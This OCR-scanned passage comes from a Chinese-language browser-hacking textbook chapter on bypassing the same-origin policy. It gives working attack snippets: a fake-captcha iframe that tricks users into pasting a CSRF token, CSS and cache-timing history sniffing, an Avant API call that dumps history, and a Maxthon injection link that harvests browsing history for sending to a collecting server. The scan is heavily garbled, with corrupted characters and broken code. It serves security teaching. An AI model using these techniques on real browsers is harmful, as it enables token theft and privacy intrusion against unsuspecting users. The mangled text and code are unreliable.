图 4-19 展 示 了 用 户 看 到 的 一 小 部 分 内 容 ， 而 图 4-20 展 示 了 后 台 到 底 发 生 了 什么 。 





















































i To protect against spam, please retype the below security code: 
; Security code: Ea 二 “53525955 了 





i Repeat security code: CC —] 


Register 





图 4-19 用户 可 见 的 小 部 分 内 容 


! To protect against spam, please retype the below security code: 
: Security code: 


用 户 所 见 内 容 


n: lpx solid #ccc; 














图 4-20  JCK VA CHER n] DAA SE NA 


如 果 用 户 在 Security Code 输 入 框 中 三 击 鼠 标 ， 就 会 复制 整 行 内 容 ， 如 图 4-20 所 示 。 突 出 显示 
的 内 容 仅仅 是 整 行内 容 的 一 少 部 分 , 而 你 不 希望 让 没有 疑心 的 用 户 看 到 更 多 。 这 个 技术 关键 是 把 
内 骨 框 架 定位 在 顶级 窗口 的 恰当 位 置 。 这 里 的 Security Code 输 入 框 并 不 是 真正 的 输入 框 ， 而 是 一 
个 内 骸 框 架 ， 看 下 面 的 代码 就 知道 了 : 


<style> 
































iframe#one { 
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margin: 0; 

padding: 0; 

width: 9em; 

height: lem; 

border: 2px inset black; 

font: normal 13px/14px monospace; 
display: inline-block; 

j 

</style> 


<p> 
<label>Security code:</label><iframe id=one scrolling=no 
src="http://browservictim.com/any"></iframe> 

</p> 


攻击 目标 把 内 容 粘贴 到 第 二 个 输入 字段 时 , 实际 上 粘贴 的 是 整 行 内 容 , 而 且 整 行内 容 完全 暴 
露 给 你 了 。 此 时 ( 如 图 4-21 所 示 )， 就 可 以 取得 一 个 防御 XSRF 的 token， 利 用 它 可 以 对 内 艇 框架 中 
的 源 实 施 进一步 攻击 。 











var csrf_token = '35fb6df6-2ab9-408b-abe3-7694 1 2a58e15'; 


OK | 











图 4-21 ”用户 粘贴 的 整 行 是 防御 XSRF 的 token 


这 个 技术 可 以 跨 域 提取 内 容 ， 从 而 绕 过 SOP。 值 得 一 提 的 是 ，2011 年 10 月 ,很 多 人 利用 这 个 
技术 对 付 Facebook””。 

另 一 种 跨 域 提取 内 容 的 技术 是 LucaDe Fulgentis 发 现 的 从 内 椒 框 架 到 内 般 框 架 的 拖 放 ”。 内藤 
框架 间 的 拖 放 与 前 述 拖 放 Poc 类 似 ， 主 要 区 别 是 拖 放 的 终点 是 内 舰 框架 ， 而 非 顶 级 窗口 。 

实施 这 种 攻击 ， 必 须 控制 拖 放 的 目标 框架 。 在 内 容 被 放 到 框架 中 时 ，Firefox 会 把 内 容 提 交 给 
你 ， 甚 至 可 以 跨 域 。 之 所 以 能 够 如 此 ， 是 因为 Firefox 的 核心 代码 不 会 检查 内 纶 框架 间 的 拖 放 是 否 
跨 域 。 在 最 早 的 披露 信息 中 ，De Fulgentis 演 示 了 如 何以 LinkedIn 用 户 为 目标 ， 盗 取 他 们 的 防御 
XSRF 的 token， 然 后 在 用 户 个 人 信息 里 添加 任意 电子 邮件 地 址 。 

De Fulgentis 的 技术 揭示 了 没有 对 拖 放 施加 SOP 限 制造 成 的 男 一 个 安全 隐患 。 


43.3 利用 浏览 器 历史 


攻击 浏览 器 历史 也 可 以 获取 其 他 源 的 信息 ,可 以 知道 当前 浏览 器 〈 那 当然 就 是 当前 用 户 i 
问 过 哪些 网 站 。 

过 去 , 浏览 器 历史 攻击 只 是 简单 地 检测 写 到 网 页 中 的 链接 的 颜色 。 稍 后 我 们 简单 了 解 一 下 使 
用 CSS 颜 色 ， 但 要 记 住 ， 现 代 浏 览 器 已 经 堵 上 了 这 个 漏洞 。 

另外 ， 我 们 还 会 介绍 计时 技术 。 这 些 攻击 技术 都 是 当前 获取 多 种 浏览 器 历史 信息 的 最 有 效 
方式 。 
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某 些 极端 的 情况 下 ， 还 可 以 利用 特定 浏览 器 API 攻 击 历史 记录 。 我 们 会 介绍 在 一 些 非 常 小 众 
的 浏览 器 中 ， 比 如 Avant 和 Maxthon 浏 览 器 ， 如 何 利 用 相应 的 漏洞 。 

1. 使 用 CSS 颜 色 

在 美好 的 过 去 ， 使 用 CSS 信 息 就 可 以 窃取 浏览 器 历史 。 这 主要 依靠 利用 visiteq 这 个 CSS 选 
择 符 。 下 面 的 技术 简单 却 实用 ( 2002 年 的 Full Disclosure "讨论 过 )。 看 看 下 面 这 个 链接 : 

«a id="site_1" href-'http://browservictim.com"»link«/a 

可 以 使 用 CSS 动 作 选 择 符 , 来 检测 攻击 目标 是 否 访问 过 前 面 的 链接 ， 进 而 会 存在 于 浏览 器 历 
史记 录 中 : 


#Site_l:visited ( 
background: url(/browserhacker.com?site-browservictim); 


} 

这 里 使 用 的 是 background 选 择 符 ， 实 际 上 任何 可 以 指定 URI 的 选择 符 都 可 以 使 用 。 在 这 里 ， 
如 果 浏 览 器 历史 中 存在 broswervictimn.com， 那 浏览 器 就 会 提交 一 个 指向 browserhacker .com? 
site=browservictim 的 GET 请 求 。 

Jeremiah Grossman 在 2006 年 也 发 现 了 一 个 类 似 的 技术 ， 这 个 技术 依赖 于 检测 链接 元 素 的 颜 
色 。 在 多 数 浏览 器 中 ， 如 果菜 个 链接 被 点 击 过 ， 则 默认 行为 是 将 链接 文本 设置 为 紫色 。 而 如 果 该 
链接 没有 被 点 击 过 ， 则 链接 文本 为 蓝 色 。 在 Grossman 最 初 的 概念 验证 中 “, 访问 过 的 链接 样式 会 
被 某 种 自 定义 样式 覆盖 C 比如 红色 )。 然 后 ， 可 以 用 一 个 脚本 动态 生成 页 面 上 的 链接 ， 而 不 让 用 

户 察 觉 。 再 通过 对 比 之 前 覆盖 的 红色 样式 ， 如 果 匹 配 ， 则 说 明 相 应 的 网 站 存在 于 浏览 器 历史 中 。 

比如 下 面 这 个 例子 : 


<html> 

<head> 

<style> 

#link:visited (color: #FF0000;} 

</style> 

</head> 

<body> 

<a id-"link" href-"http://browserhacker.com" 
target="_blank">clickme</a> 

<script> 

var link = document.getElementById("link"); 

var color = document.defaultView.getComputedStyle (link, 
null) .getPropertyValue("color"); 
console.log(color); 

«/script» 

</body> 

</html> 


x pmo 而 且 浏 览 器 可 以 被 攻击 ,那么 控制 台 日 志 中 的 输入 就 会 是 rgb (255, 
0, ， 也 就 是 CSS 中 的 红色 。 如 果 在 最 新 的 ( 打 过 补丁 的 ) Firefox 中 运行 这 段 代 码 ， 则 始终 会 
返 en 07 238). 

如 今 ， 大 多 数 现代 浏览 器 都 塔 上 了 这 个 漏洞 。 例如 ，Firefox 就 是 在 2010 年 打上 这 个 补丁 的 *。 
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2. 使 用 缓存 计时 

Felten 和 Schneider“ 在 2000 年 最 早 对 外 发 表 了 关于 缓存 计时 攻击 的 研究 论文 。 这 篇 题 为 
"Timing Attacks on Web Privacy” 的 论文 ， 主 要 探讨 了 在 有 和 没有 浏览 器 缓存 的 情况 下 ， 如 何 度 
量 访 问 资源 的 必要 时 间 。 基 于 这 一 研究， 可 以 推断 出 资源 是 否 已 经 取得 (并 缓存 了 )。 这 个 手段 
的 问题 就 是 在 初始 化 测试 中 ， 查 询 浏 览 器 缓存 也 会 污染 它 。 

Michal Zalewski 探 索 过 一 个 提取 浏览 器 缓存 的 非 破 坏 性 的 技术 “， 与 缓存 计时 技术 类 似 。 在 
本 书写 作 时 ， 这 个 技术 对 现代 浏览 器 仍然 适用 。 

Zalewski 的 方法 涉及 把 资源 加 载 到 内 般 框 架 、 触 发 SOP 和 防止 缓存 变更 。 为 此 ， 内 骸 框 架 非 
党 合用 ， 因 为 有 SOP， 从 而 可 以 防止 内 鹃 框架 完全 加 载 资源 ,阻止 本 地 缓存 的 变更 。 缓 存 保 持 不 
变 是 由 于 加 载 和 伸 载 资源 时 使 用 了 短暂 计时 。 只 要 可 以 确定 某 个 特殊 资源 的 缓存 丢失 ,内 能 框架 
就 停止 加 载 。 利 用 这 个 行为 可 以 对 同一 资源 的 不 同 阶段 进行 测试 。 

利用 这 个 技术 能 够 最 有 效 攻 击 的 资源 是 CSS 和 JavaScript 文 件 , 因为 它们 是 浏览 器 经 常 缓存 的 
































内 容 ， 而 


且 只 要 浏览 目标 网 站 就 会 加 载 它们 。 要 记 住 一 点 ， 由 于 这 些 资源 会 被 加 载 到 内 舱 框 架 ， 








所 以 不 要 使 用 X-Frame-Options ( 而 非 Al1low ) 等 破坏 框架 的 逻辑 。 
图 4-22 展 示 了 这 种 攻击 的 输出 ,这 里 , 可 以 确定 用 户 浏 览 过 AboveTopSecret.com 和 Wikileaks.org。 


用 户 浏 览 过 wikileaks.org 和 abovetopsecret.com 


正确 取得 了 浏览 器 历史 记录 














che_timing.html (line 230) g 
/* Just a logging helper. */ 
cache, timing.html (line 230) =“ 
cache_timing.htm! (line 230) 
cache timing.html (line 230) 
cache timing.html (line 230) 
cache. timing.htm! (line 230) /* Decides what t lo nex lay schedule another attemp! or the same targ: 
= select a arge 
3 cache_timing.html (line 230) 
Not visited: eBay [5+] cache_timing.htm! (line 230) 














图 4-22 ”使 用 缓存 计时 获取 浏览 器 历史 记录 




















在 浏览 这 两 个 网 站 时 ， 通 常会 加 载 的 两 个 资源 是 : 


http 
http 


://wikileaks.org/squelettes/random.js 
://www.abovetopsecret.com/forum/ats-scripts.js 


这 一 技术 的 核心 代码 如 下 : 


function wait_for_noread() { 
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try { 
/* 
* 这 里 存在 SOP 漏 洞 
* RAZEBA EPI KYSER RIM location. href 
*/ 
if (frames['f'].location.href -- undefined) throw 1; 


* 到 TIME LIMITZ A, REAA dk TE Je XX l1ocation.href 
* GN maybe test next ()EHA RERMsrcHabout :blank 
* 防止 完全 加 载 资源 而 替代 缓存 
* 然后 处 理 下 一 个 资源 
ey 
if (cycles++ >= TIME_LIMIT) { 
maybe test next(); 
return; 





} 
setTimeout (wait_for_noread, 1); 
} catch (e) { 
/* 
* 找到 SOP 同 源 
* 确认 资源 已 缓存 
F 
confirmed_visited = true; 
maybe test next(); 


) 
如 果 在 某 个 超时 时 间 之 前 触发 SOP， 说 明 命中 了 缓存 。 这 就 可 以 确定 资源 被 缓存 过 ， 从 而 推 
断 用户 曾 经 访问 过 缓存 内 容 的 来 源 网 站 。 网 4-23 演 示 了 这 个 行为 。 














Elements Resources Network Sources Timeline Profiles Audits | Console | 


Social networks: 
Not visited: MySpace [4+] 
Content platforms: 
y Resource interpreted as Document but tronsterced with MIME type application/x-javascript: 


> Unsafe JavaScript attempt to access frame with URL h 
http://localhost/cache timing.html. Domains, protocols and ports must match. 


Visited: Wikileaks [0:1] 
Online media: 
ü Resource interpreted as Document but transferred [7 MIME type application/x-javascript: 


» Unsafe JavaScript attempt to access frame with URL 
http;//localhost/cache timing. html. Domains, protocols and ports must match. 


Visited: AboveTopSecret.com [@:1] 
Commerce: 
Not visited: eBay [4+] 





图 4-23 ”违反 SOP 报 错 
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有 关 这 个 技术 的 完整 源 代码 ， 可 以 看 https://browserhacker.com ， 或 者 Wiley 的 网 站 www. 
wiley.com/go/browserhackershandbook， 其 中 最 初 的 三 个 PoC 是 经 过 修改 的 ， 合 并 成 了 一 个 单独 的 
代码 片段 。 

在 Zalewski 研 究 的 启发 下 ，Mansour Behabadi^* 发 现 了 另 一 种 依赖 图 片 加 载 的 技术 。 该 技术 目 

只 对 WebKit 和 和 Gecko 核心 的 浏览 器 起 作用 。 如 果 你 的 浏览 器 之 前 缓存 过 一 张 图 片 ， 那 么 从 缓存 
init 书 ， 通 常 耗 时 不 超过 10 毫 秒 。 而 如 果 浏 览 器 的 缓存 中 没有 这 张 图 片 , 那么 从 互联 网 获取 它 
的 时 间 就 要 看 网 络 延迟 和 图 片 大 小 了 。 利 用 这 个 缓存 计时 信息 , 可 以 推测 目标 浏览 器 之 前 是 否 访 
问 过 某 网 站 。 下 面 的 例子 展示 了 这 个 技术 的 原理 : 


// 检查 是 否 已 访问 过 Twitter 
var url = "https://twitter.com/images/spinner.gif"; 
var loaded = false; 
var img = new Image(); 
var start = new Date().getTime(); 
img.src = url; 
var now = new Date().getTime(); 
if (img.complete) { 
delete img; 
console.log("visited") ; 
} else if (now - start > 10) { 
delete img; 
window.stop(); 
console.log("not visited"); 
}else{ 
console.log("not visited"); 






























































j 

如 果 在 Firefox 或 Chrome 中 打开 这 段 代 码 , 而 且 你 之 前 访问 过 Twitter, 那么 应 该 在 浏览 器 控制 
f (Firebug 或 Developer Tools ) 中 看 到 “visited” 字 样 。 相 反 ， 如 果 由 于 没有 缓存 过 ， 图 片 加 载 
时 间 超 过 10 毫 秒 ， 并 且 正 在 从 Twitter 网 站 中 获取 该 图 片 ， 那 么 就 会 看 到 “not visited”. 

要 记 住 ， 使 用 这 个 技术 的 问题 ， 那 就 是 是 要 知道 你 想 检测 的 资源 〈 比如 这 里 的 http://twitter. 
Ee E gif )， 可 能 会 随时 间 推 移 而 变化 。Zalewski 在 最 初 的 PoC 中 用 到 的 一 些 资源 就 

经 过 时 了 。 

鉴于 这 些 技术 依赖 于 读 取 缓存 时 特定 、 短 暂 的 计时 ， 因 此 同样 的 方案 可 能 会 因 机 器 性 能 
导致 不 同 结 果 。 对 第 二 种 技术 而 言 ， 也 就 是 我 们 这 里 硬 编码 了 10 上 毫秒 计时 ,情况 更 是 如 此 。 假 
如 你 在 播放 YouTube 上 的 高 清 视频 ， 而 你 的 机 器 正在 大 量 使 用 CPU 和 IO ， 那么 检测 结果 的 精确 
度 会 降低 。 

3. 使 用 浏览 器 API 

Avant 是 一 个 不 太 知 名 的 浏览 句 ， 可 以 切换 Trident、Gecko 和 WebKit 泻 染 引 擎 。Roberto Suggi 
Liverani 在 2012 年 之 前 就 发 现 了 一 种 攻击 方式 ， 可 以 在 Avant 中 调用 特定 的 浏览 器 ApI 来 绕 过 SOP。 
下 面 看 看 展示 了 该 问题 的 代码 : 


var av_if = document.createElement ("iframe") ; 
av if.setAttribute('src', "browser:home") ; 
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name','av if'); 


av if.setAttribute(' 

av if.setAttribute('width','0'); 
av if.setAttribute('heigth','0'); 

av if.setAttribute('scrolling','no'); 
document.body.appendChild(av if); 


var vstr = (value: ""}; 


// 如 果 泻 染 引 掌 是 Firefox， 这 将 有 效 
window['av if'].navigator.AFRunCommand(60003, vstr); 
alert(vstr.value); 


jx BEIC FEA REAL AY browser:home tb Jib Jn R BI P Hx EE 2B ,— SR Je: E navigator X) BE PUT 
AFRunCommand () 国 数 。 这 个 函数 名 不 见 经 传 ， 是 Avant 给 DOM 添 加 的 专 有 API。 在 Liverani 的 研 
究 中 , 他 暴力 破解 了 传 给 这 个 函数 第 一 个 参数 的 一 些 整数 值 , 发 现 向 AFRunCommang () 传 人 60003 
和 一 个 JSON 对 象 ， 就 可 以 取得 完整 的 浏览 器 历史 记录 。 
很 明显 ， 这 绕 过 了 SOP， 因 为 运行 在 源 http://browserhacker.com 上 的 代码 不 应 该 像 这 里 一 样 ， 
读 取 到 特权 区 域 ( 比如 browser:home ) 的 内 容 。 执 行 前 面 的 代码 会 看 到 一 个 弹出 窗口 ， 显 示 浏 览 
避 历 史记 录 ， 如 图 4-24 所 示 。 
NV http://172.16.37.1/avant.html - Avant Browser —— 
a. (09.8.6) * 
Google 国 


bk E View QSearch & TT 








N 


© 17216371 

© beefprojectcom 
© www.facebook.com 
© www.google.co.uk 


«Aclass-"link col title="BeEF - The Browser Exploitation Framework Project” 
href="http://beefproject.com/"><img border="0" vspace="0" hspace="3" align=TOP 
alt=" srce"browser.home/icons/beefproject.com"»http:;//beefproject.com/«/A» 
*Aclass-"link cor title="Welcome to Facebook - Log In, Sign Up or Learn More" 
hrefz"https-liwww.facebook.com/"»«img border="0" vspace="0" hspace="3" 
align=TOP alt=" src="browser:home/images/page. gif =https: 
lwwwfacebook.com/</A> 

<Aclass="link_col title="Google” href="http-/www.google.co.uk/"><img border="0" 
vspace="0" hspace="3" align=TOP alt=" src="browser:home/icons 
‘www.google.co.uk>http:/Avww.google.co.uk/</A> 


(ee) 





图 4-24 WH 8 üAFRuncommanaPKZX 


Maxthon 3.4.5 build 2000 中 也 存在 一 个 类 似 的 隐患 。Maxthon 是 一 个 与 Avant 类 似 的 浏览 
提供 了 访问 文件 甚至 可 执行 文件 的 非 标准 API。 

Roberto SuggiLiverani 发 现 ”， 通 过 about:history 页 面 泻 染 的 内 容 ,， 没 有 进行 有 效 的 输出 转 义 。 
这 一 点 就 可 以 利用 了 。 如 果 你 欺骗 目标 用 户 打 开 类 似 如 下 的 链接 , 那么 恶意 注入 的 代码 就 会 被 持 
久 存 人 历史 页 面 : 


http://172.16.37.1/malicious.html#" onload-'alert(1)'«!- 
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每 次 目标 打开 浏览 器 历史 记录 时 ， 都 将 执行 上 面包 含 了 onloaq 属 性 的 代码 。 最 关键 的 是 ， 
这 里 的 亚 意 JavaScript 代 码 是 在 特权 环境 里 执行 的 。 巧 的 是 , about:history 页 面 又 被 映射 到 Maxthon 
的 一 个 自 定义 资源 : mx://res/history/index.htm。 那 么 向 这 里 注入 代码 ， 就 可 以 窃取 到 所 有 历史 内 
容 。 比 如 ， 下 面 的 代码 会 解析 history-list 区 域 中 的 所 有 链接 : 


links = document.getElementById('history-list') 
.getElementsByTagName('a'); 











result = ""; 
for(var i=0; i«links.length; i++) { 
if(links[i].target == "_blank") { 


result += links[i].href+"\n"; 
} 
} 


alert (result); 


这 些 代码 可 以 通过 下 面 的 链接 打包 和 传递 


http://172.16.37.1/malicious.html#" onload-'links-document. 
getElementById("history-list").getElementsByTagName("a"); 
result-"";for(i-z0;i«links.length;i-««)(if(links[i].target--" blank") 
{result+=links[i].href+"\n";}}alert (result) ;'<!-- 


、 这 种 跨 内 容 脚 本 ( 第 7 章 会 深入 讨论 ) 漏洞 是 一 直 存 在 的 。 一 旦 把 恶意 内 容 加 载 
到 浏览 器 页 面 ， 其 中 的 代码 就 会 在 用 户 每 次 访问 自己 的 历史 记录 时 执行 ， 结 果 如 图 4-25 所 示 。 











|S aboutthistory 





[7] Enable Daliaajistaa 
Alert from Web Page 














2013-3-6, Wednesday 
mx//res/history/index.htm> 
05:42 AM Welcome to Facebook - http://go.maxthon.com/redir/public/feature_post.htm?f=nuGhistorymanager&v 
23.39.2000 
05:42 AM http://www.facebook.ca] | https://www.facebook.com/ 
05:42 AM Electronics, Cars, Fashiol pa ieee a 
05:42 AM Free software download| | http://www.brothersoft.com/?ref=maxthon 
http://www.aol.co.uk/?rzwww.aol.com 
05:42AM  AOL.co.uk http://www.aol.com/ 
http://uk.yahoo.com/?p=us 
05:42 AM "WE http://www.aol.com/ http://eu.ask.com/7l- dis&oz1556&qsrcz119 
» http://www.digg.com/ 
05:42AM @! Yahoo! UK bites / Se / 
05:42 AM Ask.com Search Engine {| http://www.twitter.com/ 
http://www.yahoo.com/ 
05:42AM AF Digg - What the Internet}! http://www.bing.com/?FORM=MXB003&pc=MXBR 
AGAM http://172.16.37 1/malicious.html* 


05:42 AM 
05:42 AM 








05:42 AM 








05:41 AM http://172.16.37 1/malicious.html*" onload='links=document.getElementByld("history-list").getElementsByTagName("a" 





ER 


图 4-25 ”执行 了 以 链接 形式 注入 的 恶意 代码 


自然 地 ， 要 发 起 真正 的 攻击 ， 必 须 使 用 第 3 章 介 绍 的 某 种 勾 连 技术 替换 alert () 。 这 样 ， 才 
E 把 穷 取 的 历史 记录 发 回 到 收集 它们 的 服务 絮 。 
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通过 这 些 示 例 , 我 们 可 以 看 到 很 多 严重 的 问题 。 显然 , 安全 研究 者 需要 持续 寻找 软件 中 的 漏 
洞 ， 特别 是 浏览 器 的 漏洞 。 虽 然 这 些 缺 陷 是 在 Avant 和 Maxthon 中 发 现 的 , 但 浏览 器 的 攻击 面 也 是 
与 日 俱 增 的 。 

虽然 可 以 让 自 定义 浏览 器 选择 使 用 WebKit 和 Gecko 这 样 的 技术 ,但 新 的 API 毕 竟 层 出 不 穷 。 
所 以 ， 还 是 尽快 发 动 你 的 引擎 吧 









































4.4 小 结 


本 章 深 入 探讨 了 SOP， 以 及 在 攻击 浏览 锅 时 绕 过 它 的 重要 性 。 绕 过 SOP 可 以 让 被 匀 连 的 浏览 
器 成 为 开放 代理 。 不 仅 如 此 ， 而 且 能 够 读 取 不 同 来 源 的 HTTP 响 应 ， 这 会 让 接 下 来 几 章 将 要 介绍 
的 攻击 技术 变 得 可 能 。 

要 可 靠 地 绕 过 SOP， 重 要 的 是 要 全 面 理解 SOP 的 各 种 变形 。 最 简单 地 ，SOP 就 是 把 拥有 相同 
主机 名 、 协 议和 端口 的 资源 视 为 同 源 。 如 果 其 中 任何 属性 有 所 不 同 , 那么 资源 就 不 是 同 源 。 只 有 
同 源 的 资源 之 间 才 能 无 限制 地 交互 。 然 而 , SOP 在 不 同 环境 和 浏览 器 中 有 着 不 一 致 的 实现 。 比 如 ， 
DOM 中 的 SOP 和 插件 中 的 SOP 往 往 行为 不 同 。 

掌握 了 SOP 的 功能 之 后 , 我 们 介绍 了 很 多 绕 过 SOP 的 技术 , 因 攻 击 的 情景 而 不 同 。 具 体 来 说 ， 
本 章 介 绍 的 绕 过 SOP 的 技术 涉及 在 Java、Adobe Reader, Adobe Flash , Silverlight IE , Safari , Firefox , 
Opera， 其 至 云 存 储 中 实现 攻击 。 

明白 如 何 绕 过 SOP 之 后 ,你 的 工具 也 会 更 丰富 。 比 如 通过 目标 浏览 器 的 代理 请 求 、 利 用 界面 
伪装 攻击 ， 甚 至 揭示 用 户 浏览 器 的 历史 记录 。 绕 过 SOP 之 后 ， 能 够 为 攻击 浏览 需 打 开 方 便 之 门 。 

对 浏览 器 开发 者 来 说 ， 在 不 同 浏览 器 类 型 、 版 本 和 插件 中 实现 一 致 的 ( 以 及 更 重要 的 ) 强制 
性 的 SOP, 是 一 项 巨大 的 挑战 。 而 主流 浏览 器 中 日 益 增 加 的 新 HTML5 特 性 , 也 进一步 提高 了 克服 
挑战 的 难度 。 这 也 是 在 未 来 一 段 时 间 ， 无 论 对 攻击 还 是 防御 而 言 ， 绕 过 SOP 依 然 非常 重要 的 原因 
所 在 。 



























































4.5 问题 


(1) 什么 是 同 源 策略 ， 以 及 为 什么 它 对 浏览 器 安全 如 此 重要 ? 

(2) 为 什么 攻击 者 对 绕 过 SOP 非 常 感 兴趣 ? 

(3) 解释 一 下 怎么 使 用 被 勾 连 的 浏览 器 作为 HTTP 代 理 。 在 绕 过 SOP 和 不 绕 过 SOP 的 情况 下 ， 
使 用 它 有 什么 不 同 ? 

(4) 描述 在 Java 中 绕 过 SOP 的 一 种 方案 。 

(5) 解释 一 下 在 Safari 中 绕 过 SOP 的 原理 。 

(6) 解析 一 下 Adobe Reader SOP 绕 行 技术 与 XEE 漏 洞 的 关系 。 

(7) 描述 一 个 点 击 劫持 的 例子 。 

(8) 描述 一 个 文件 劫持 的 例子 。 
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(9) 攻击 浏览 器 历史 记录 的 方法 是 怎样 演变 的 ?描述 基于 缓存 计时 的 一 种 最 新 攻击 方法 。 
(10) 为 什么 分 析 浏 览 器 API 很 重要 ? 摘 述 一 种 对 Avant 或 Maxthon 浏 览 硕 进行 攻击 的 方法 。 
要 查看 问题 的 答案 ， 请 访问 本 书 网 站 https://browserhacker.com/answers， 或 者 Wiley 的 网 站 











http://www.wiley.com/go/browserhackershandbook。 


4. 


10. 
11. 
12. 
13. 
14. 
15. 


16. 


6 注释 


Oracle. (2009). URL class. Retrieved May 11, 2013 from http://docs.oracle.com/javase/6/docs/api/java/net/ 
URL. html#equals(java.lang.Object) 

Esteban Guillardoy. (2013). Keep calm and run this applet. Retrieved May 11, 2013 from http://immunityproducts. 
blogspot.co.uk/2013/02/keep-calm-and-run-this-applet.html 

Oracle. (2013). What should I do when I see a security prompt from Java? Retrieved May 11, 2013 from 
https://www.java.com/en/download/help/appsecuritydialogs.xml 

Will Dormann. (2012). Don’t sign that applet. Retrieved May 11, 2013 from http://www.cert.org/blogs/certcc/ 
2013/04/dont sign that applet.html 

Mozilla. (2012). LiveConnect. Retrieved May 11, 2013 from https://developer.mozilla.org/en/docs/ LiveConnect 
Neal Poole. (2011). Java Applet SOP Bypass via HTTP Redirect. Retrieved May 11, 2013 from https://nealpoole. 
com/blog/2011/10/java-applet-same-origin-policy-bypass-via-http-redirect/ 

Frederik Braun. (2012). Origin Policy Enforcement in Modern Browsers. Retrieved from https://frederik-braun. 
com/publications/thesis/Thesis-Origin Policy Enforcement in Modern Browsers.pdf 

WebSense. (2013). How are Java attacks getting through. Retrieved August 4, 2013 from http://community. 
websense.com/blogs/securitylabs/archive/2013/03/25/how-are-java-attacks-getting-through.aspx 

Bit9. (2013). Most enterprise networks riddled with vulnerable Java installations. Retrieved August 4, 2013 
from http://www.networkworld.com/news/2013/071813-most-enterprise-networks-riddled-with-271939.html 
Eric Romang. (2013). Oracle Java Exploits and 0 days Timeline. Retrieved August 4, 2013 from http://eromang. 
zataz.com/uploads/oracle-java-exploits-Odays-timeline.html 

CVEDetails. (2013). Adobe Acrobat Reader Vulnerability Statistics. Retrieved August 4, 2013 from http://www. 
cvedetails.com/product/497/Adobe-Acrobat-Reader.html?vendor _ id=53 

Adobe. (2005). Acrobat JavaScript Scripting Guide. Retrieved May 11, 2013 from http://partners.adobe.com/ 
public/developer/en/acrobat/sdk/AcroJSGuide.pdf 

Michal Zalewski. (2010). Same-origin policy for Silverlight. Retrieved May 11, 2013 from http://code.google. 
com/p/browsersec/wiki/Part2#Same-origin policy for Silverlight 

Alex Kouzemtchenko. (2008). Same Origin Policy Weaknesses. Retrieved May 11, 2013 from http://powero- 
fcommunity.net/poc2008/kuza55.pdf 

0x000000. (2008). Defeating The Same Origin Policy. Retrieved May 11, 2013 from http://mandark.fr/0x000000/ 
articles/Defeating The Same Origin Policy.html 

0x000000. (2007). CVE-2007-3514. Retrieved May 11, 2013 from http://www.cvedetails.com/cve/CVE-2007- 
3514/ 





4.6 注释 141 





17. 


18. 


19. 


20. 


21. 


22. 


23. 


24. 


25. 


26. 


27. 


28. 


29. 


30. 


3]. 


32. 


33. 


34. 


35. 


Gareth Heyes. (2012). Firefox knows what your friends did last summer. Retrieved May 11, 2013 from http://www. 
thespanner.co.uk/2012/10/10/firefox-knows-what-your-friends-did-last-summer/ 

Michael Coates. (2012). Security Vulnerability in Firefox 16. Retrieved May 11, 2013 from https://blog.mozilla. 
org/ security/2012/10/10/security-vulnerability-in-firefox-16/ 

Opera Software. (2012). Opera 12.10 Changelog. Retrieved May 11, 2013 from http://www.opera.com/docs/ 
changelogs/unified/1210/ 

Gareth Heyes. (2012). Advisory: Cross domain access to object constructors can be used to facilitate cross-site 
scripting. Retrieved May 11, 2013 from http://www.opera.com/support/kb/view/1032/ 

Gareth Heyes. (2012). Opera x-domain with video tutorial. Retrieved May 11, 2013 from http://www.thespanner. 
co.uk/2012/11/08/opera-x-domain-with-video-tutorial/ 

Roi Saltzman. (2012). DropBox Cross-zone Scripting. Retrieved May 11, 2013 from http://blog.watchfire.com/ 
files/dropboxadvisory.pdf 

Roi Saltzman. (2012). Google Drive Cross-zone Scripting. Retrieved May 11, 2013 from http://blog.watchfire. 
com/files/googledriveadvisory.pdf 

Veracode. (2012). Security Headers on the Top 1,000,000 Websites. Retrieved May 11, 2013 from http://www. 
veracode.com/blog/201 2/1 1/security-headers-report/ 

Anton Rager. (2002). Advanced Cross Site Scripting Evil XSS. Retrieved May 11, 2013 from http://xss-proxy. 
sourceforge.net/shmoocon-XSS-Proxy.ppt 

Stefano Di Paola and Giorgio Fedon. (2006). Subverting Ajax. Retrieved May 11, 2013 from http://events.ccc. 
de/congress/2006/Fahrplan/attachments/1158-Subverting _ Ajax.pdf 

Ferruh Mavituna. (2007). XSS Tunneling. Retrieved May 11, 2013 from http://labs.portcullis.co.uk/download/ 
XSS-Tunnelling.pdf 

Krzysztof Kotowicz. (2009). New Facebook clickjacking attack in the wild. Retrieved May 11, 2013 from 
http://blog.kotowicz.net/2009/12/new-facebook-clickjagging-attack-in.html 

Jesse Ruderman. (2002). IFrame content background defaults to transparent. Retrieved May 11, 2013 from 
https://bugzilla.mozilla.org/show_bug.cgi?id=154957 

Robert Hansen and Jeremiah Grossman. (2008). Clickjacking. Retrieved May 11, 2013 from http://www.sectheory. 
com/clickjacking.htm 

Rich Lundeen. (2012). BeEF Clickjacking Module and using the REST API to Automate Attacks. Retrieved May 
11, 2013 from http://webstersprodigy.net/2012/12/06/beef-clickjacking-module-and-using-the-rest-api-to-auto 
mate-attacks/ 

Giorgio Maone. (2010). What is ClearClick and how does it protect me from Clickjacking? Retrieved May 11, 
2013 from http://noscript.net/faq#qa7_4 

Marcus Niemietz. (2012). Cursorjacking. Retrieved May 11, 2013 from http://www.mniemietz.de/demo/ 
cursorjacking/cursorjacking.html 

Krzysztof Kotowicz. (2012). Cursorjacking Again. Retrieved May 11, 2013 from http://blog.kotowicz.net/ 
2012/01/cursorjacking-again.html 

Sebastian Lekies, Mario Heiderich, Dennis Appelt, Thorsten Holz, and Martin Johns. (2012). On the fragility 
and limitations of current Browser-provided Clickjacking protection schemes. Retrieved May 11, 2013 from 
http://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/clickjacking-woot12.pdf 





142 BAS 绕 过 同 源 策略 





36. 


37. 


38. 


39. 


40. 


41. 


42. 


43. 


44. 


45. 


46. 


47. 


Krzysztof Kotowicz. (2011). Filejacking: How to make a file server from your browser. Retrieved May 11, 
2013 from http://blog.kotowicz.net/2011/04/how-to-make-file-server-from-your.html 

Michal Zalewski. (2010). Drag-and-drop may be used to steal content across domains. Retrieved May 11, 2013 
from https://bugzilla.mozilla.org/show_bug.cgi?id=60599 1 

Krzysztof Kotowicz. (2011). Cross domain content extraction with fake captcha. Retrieved May 11, 2013 from 
http://blog.kotowicz.net/201 1/07/cross-domain-content-extraction-with.html 

Zeljka Zorz. (2011). Facebook spammers trick users into sharing anti-CSRF tokens. Retrieved May 11, 2013 
from http://www.net-security.org/secworld.php?id=11857 

